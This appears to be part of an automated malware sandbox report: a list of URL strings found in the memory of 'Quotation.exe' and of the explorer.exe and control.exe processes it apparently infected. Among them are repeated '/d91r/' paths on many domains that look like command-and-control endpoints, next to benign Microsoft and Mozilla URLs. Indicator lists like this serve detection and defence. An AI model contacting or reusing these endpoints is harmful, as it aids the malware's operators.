        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ru
        Source: explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ru/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.interactive-media.ruwww.cardinialethanol.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.julesgifts.co.uk
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.julesgifts.co.uk/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.julesgifts.co.ukwww.aznqmd.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014958000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005FB8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.ghostdyes.net
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maxhaidt.comwww.julesgifts.co.uk
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://www.nero.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.top
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.top/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.top/d91r/_w7xz=bR5Glu
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.qx386.topwww.rt66omm.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/d91r/
        Source: explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.comwww.decoraptor.store
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26444916820.00000000103BA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.solya-shop.comwww.buymyenergy.com
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://www.symauth.com/cps0(
        Source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.drString found in binary or memory: http://www.symauth.com/rpa00
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/6SE=F8zFuLn
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014E0E000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000646E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.texasgent.com/d91r/?6SE=F8zFuLn&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJK
        Source: explorer.exe, 0000000C.00000003.23159531860.00000000103B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23158699499.00000000103AB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.texasgent.comwww.brightfms.com
        Source: Quotation.exe, 0000000A.00000001.21847480465.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: Quotation.exe, 0000000A.00000001.21847480465.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: explorer.exe, 0000000C.00000003.23178684870.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CFE2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CFE2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppz
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js
        Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.drString found in binary or memory: https://aka.ms/dotnet-warnings/
        Source: explorer.exe, 0000000C.00000002.26418329458.0000000008F53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm3
        Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000000C.00000000.22661249542.000000000CA42000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS0Q#
        Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSF
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/?Im
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008F53000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000000C.00000002.26441286993.00000000100A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22672138178.00000000100A6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?9l
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=5696A836803C42E0B53F7BB2770E5342&timeOut=10000&o
        Source: explorer.exe, 0000000C.00000003.24127896554.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24122198106.000000000CB60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26429837319.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000CB21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000CB5F000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000000C.00000000.22642464266.0000000002B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.24132472100.0000000002B4C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171896969.0000000002B42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26408426098.0000000002B4D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/svg/72/MostlySunnyDay.svg
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014634000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005C94000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
        Source: Quotation.exe, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: https://d.symcb.com/cps0%
        Source: Quotation.exe, SolutionExplorerCLI.dll.1.dr | String found in binary or memory: https://d.symcb.com/rpa0
        Source: Quotation.exe | String found in binary or memory: https://d.symcb.com/rpa0.
        Source: explorer.exe, 0000000C.00000000.22673664093.000000001021C000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://excel.office.comI
        Source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr, System.dll0.1.dr | String found in binary or memory: https://github.com/dotnet/runtime
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://hm.baidu.com/hm.js?c5f848a241986c827a6aea67b151df57
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA38A54.img
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
        Source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
        Source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp | String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000014C7C000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.00000000062DC000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://js.users.51.la/21113239.js
        Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26404796231.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D3B000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
        Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
        Source: control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/
        Source: control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/https://login.live.com/0g
        Source: control.exe, 0000000D.00000002.26404796231.0000000002D63000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D46000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22900161657.0000000002D63000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr | String found in binary or memory: https://mozilla.org0
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://outlook.com
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://powerpoint.office.com
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013FEC000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.000000000564C000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://solya-shop.com/d91r/?z4=7PV8upFW6FVa3k/MU
        Source: control.exe, 0000000D.00000002.26417532491.0000000007600000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://windows.msn.com:443/shell
        Source: explorer.exe, 0000000C.00000000.22647280128.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26413669257.0000000004CA3000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://wns.windows.com/cc6424a
        Source: explorer.exe, 0000000C.00000002.26438439735.000000000D16E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22661249542.000000000D13D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23182179139.000000000D16C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23171010295.000000000D16B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23162953109.000000000D13D000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://word.office.com
        Source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000001.00000003.21490286326.00000000029CE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26408426098.0000000002BF7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26443929724.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.23184882295.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22674613619.0000000010328000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.22642464266.0000000002BF7000.00000004.00000001.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr, libpkcs11-helper-1.dll.1.dr | String found in binary or memory: https://www.digicert.com/CPS0
        Source: control.exe, 0000000D.00000002.26417532491.0000000007615000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26417532491.0000000007681000.00000004.00000020.00020000.00000000.sdmp, 4995H5Jfc.13.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/money/other/7-common-travel-mistakes-every-rv-owner-has-made/ss-AAOGa8l
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
        Source: explorer.exe, 0000000C.00000000.22650409207.0000000008E79000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.26418329458.0000000008E79000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_domains_btn&
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/action_constructor.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=sh
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/domains/check?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/help/faq?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_faq&
        Source: explorer.exe, 0000000C.00000002.26450887427.0000000013B36000.00000004.80000000.00040000.00000000.sdmp, control.exe, 0000000D.00000002.26414291857.0000000005196000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/help/feedback?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/hosting?utm_source=shopwindow&utm_medium=click&utm_campaign=shopwindow_hosti
        Source: firefox.exe, 0000000E.00000002.22962128674.0000000012DA6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.webnames.ru/scripts/shop_window.pl?utm_source=shopwindow&utm_medium=click&utm_campaign=s
